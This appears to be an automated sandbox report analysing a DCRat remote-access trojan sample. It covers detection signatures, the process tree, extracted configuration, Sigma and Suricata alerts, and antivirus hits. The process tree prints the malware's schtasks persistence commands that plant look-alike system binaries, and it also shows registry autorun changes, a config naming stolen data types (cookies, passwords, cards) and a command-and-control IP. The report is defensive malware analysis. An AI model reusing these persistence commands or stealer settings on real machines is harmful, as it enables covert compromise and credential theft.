Edit tour

Windows Analysis Report
5U9CuGu1ru.exe

Overview

General Information

Sample name:	5U9CuGu1ru.exe renamed because original name is a hash value
Original sample name:	752748b4c26423542f08b2d3bdd47a42.exe
Analysis ID:	1531316
MD5:	752748b4c26423542f08b2d3bdd47a42
SHA1:	5c36c76818a268e3ba45ba9de7dab600a66f966e
SHA256:	56ec30189e1468de16c9e8d39908ca3428033e516a6d2fcb843963a4d36c43fe
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Suricata IDS alerts for network traffic

Yara detected DCRat

AI detected suspicious sample

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Drops PE files with benign system names

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: System File Execution Location Anomaly

Sigma detected: WScript or CScript Dropper

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

5U9CuGu1ru.exe (PID: 6496 cmdline: "C:\Users\user\Desktop\5U9CuGu1ru.exe" MD5: 752748B4C26423542F08B2D3BDD47A42)

wscript.exe (PID: 3944 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 5908 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Intodhcp\zSeea0nqF8D7gTEAJAxS8lBZw.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

containerdll.exe (PID: 748 cmdline: "C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe" MD5: 28DD5F145AEB9F6E3D1C60BC1DE330B6)

schtasks.exe (PID: 5244 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1876 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1264 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4140 cmdline: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6752 cmdline: schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1848 cmdline: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1276 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 5 /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5068 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4436 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 10 /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3332 cmdline: schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4984 cmdline: schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7060 cmdline: schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2300 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3692 cmdline: schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 368 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3808 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3280 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 984 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1360 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 652 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1248 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3332 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\Documents\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4984 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\Documents\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7060 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Documents\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3652 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 368 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5416 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6408 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 9 /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6168 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5956 cmdline: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 13 /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

wscript.exe (PID: 3140 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\file.vbs" MD5: FF00E0480075B095948000BDC66E81F0)

spoolsv.exe (PID: 6416 cmdline: C:\Users\Public\Desktop\spoolsv.exe MD5: 28DD5F145AEB9F6E3D1C60BC1DE330B6)

spoolsv.exe (PID: 1292 cmdline: C:\Users\Public\Desktop\spoolsv.exe MD5: 28DD5F145AEB9F6E3D1C60BC1DE330B6)

WHqeodkmYpJedFVKZpNEincEtJvAcD.exe (PID: 940 cmdline: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe MD5: 28DD5F145AEB9F6E3D1C60BC1DE330B6)

WHqeodkmYpJedFVKZpNEincEtJvAcD.exe (PID: 2140 cmdline: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe MD5: 28DD5F145AEB9F6E3D1C60BC1DE330B6)

cleanup

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"o\":\"^\",\"R\":\" \",\"v\":\"`\",\"J\":\"_\",\"t\":\"%\",\"H\":\"<\",\"w\":\"&\",\"V\":\",\",\"i\":\"#\",\"z\":\".\",\"c\":\"~\",\"y\":\"@\",\"U\":\"|\",\"S\":\"!\",\"j\":\">\",\"9\":\"$\",\"C\":\"-\",\"h\":\"(\",\"M\":\";\",\"X\":\")\",\"Y\":\"*\"}", "PCRT": "{\"l\":\"(\",\"v\":\">\",\"Z\":\"$\",\"U\":\".\",\"R\":\"_\",\"N\":\")\",\"D\":\";\",\"p\":\"!\",\"e\":\"^\",\"1\":\"<\",\"Q\":\"%\",\"d\":\"`\",\"Y\":\"&\",\"r\":\"#\",\"b\":\"@\",\"V\":\"-\",\"C\":\" \",\"o\":\"|\",\"W\":\"~\",\"5\":\"*\",\"B\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-YZYb6LRlx5C8eOzAhzqa", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2190779031.00000000027D9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000014.00000002.2270353647.0000000003451000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000006.00000002.2190779031.00000000026D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000019.00000002.2269260398.0000000002701000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000012.00000002.2270383739.00000000027D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000016.00000002.2270348613.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000006.00000002.2194931311.00000000126DF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: containerdll.exe PID: 748	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: spoolsv.exe PID: 6416	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: spoolsv.exe PID: 1292	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: WHqeodkmYpJedFVKZpNEincEtJvAcD.exe PID: 940	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: WHqeodkmYpJedFVKZpNEincEtJvAcD.exe PID: 2140	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Desktop\spoolsv.exe, CommandLine: C:\Users\Public\Desktop\spoolsv.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Desktop\spoolsv.exe, NewProcessName: C:\Users\Public\Desktop\spoolsv.exe, OriginalFileName: C:\Users\Public\Desktop\spoolsv.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Public\Desktop\spoolsv.exe, ProcessId: 6416, ProcessName: spoolsv.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe, ProcessId: 748, TargetFilename: C:\Users\Public\Desktop\spoolsv.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\Desktop\spoolsv.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe, ProcessId: 748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5U9CuGu1ru.exe", ParentImage: C:\Users\user\Desktop\5U9CuGu1ru.exe, ParentProcessId: 6496, ParentProcessName: 5U9CuGu1ru.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , ProcessId: 3944, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5U9CuGu1ru.exe", ParentImage: C:\Users\user\Desktop\5U9CuGu1ru.exe, ParentProcessId: 6496, ParentProcessName: 5U9CuGu1ru.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , ProcessId: 3944, ProcessName: wscript.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\Public\Desktop\spoolsv.exe, CommandLine: C:\Users\Public\Desktop\spoolsv.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Desktop\spoolsv.exe, NewProcessName: C:\Users\Public\Desktop\spoolsv.exe, OriginalFileName: C:\Users\Public\Desktop\spoolsv.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Public\Desktop\spoolsv.exe, ProcessId: 6416, ProcessName: spoolsv.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5U9CuGu1ru.exe", ParentImage: C:\Users\user\Desktop\5U9CuGu1ru.exe, ParentProcessId: 6496, ParentProcessName: 5U9CuGu1ru.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , ProcessId: 3944, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe, ProcessId: 748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WHqeodkmYpJedFVKZpNEincEtJvAcD

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe, ProcessId: 748, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f, CommandLine: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe, ParentProcessId: 748, ParentProcessName: containerdll.exe, ProcessCommandLine: schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f, ProcessId: 5244, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f, CommandLine: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe, ParentProcessId: 748, ParentProcessName: containerdll.exe, ProcessCommandLine: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f, ProcessId: 4140, ProcessName: schtasks.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5U9CuGu1ru.exe", ParentImage: C:\Users\user\Desktop\5U9CuGu1ru.exe, ParentProcessId: 6496, ParentProcessName: 5U9CuGu1ru.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" , ProcessId: 3944, ProcessName: wscript.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f, CommandLine: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe, ParentProcessId: 748, ParentProcessName: containerdll.exe, ProcessCommandLine: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f, ProcessId: 4140, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE DCRAT Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-11T01:26:54.654343+0200	2034194	1	A Network Trojan was detected	192.168.2.5	50001	141.8.197.42	80	TCP
2024-10-11T01:27:40.031323+0200	2034194	1	A Network Trojan was detected	192.168.2.5	49852	141.8.197.42	80	TCP
2024-10-11T01:27:50.846279+0200	2034194	1	A Network Trojan was detected	192.168.2.5	49922	141.8.197.42	80	TCP
2024-10-11T01:28:02.466335+0200	2034194	1	A Network Trojan was detected	192.168.2.5	49986	141.8.197.42	80	TCP
2024-10-11T01:28:15.940338+0200	2034194	1	A Network Trojan was detected	192.168.2.5	49989	141.8.197.42	80	TCP
2024-10-11T01:28:31.034050+0200	2034194	1	A Network Trojan was detected	192.168.2.5	49992	141.8.197.42	80	TCP
2024-10-11T01:28:38.751948+0200	2034194	1	A Network Trojan was detected	192.168.2.5	49995	141.8.197.42	80	TCP
2024-10-11T01:28:53.021348+0200	2034194	1	A Network Trojan was detected	192.168.2.5	49998	141.8.197.42	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 5U9CuGu1ru.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Recovery\ShellExperienceHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\Default\Documents\WmiPrvSE.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\Public\Desktop\spoolsv.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Recovery\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\kVQjSoqMfO.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
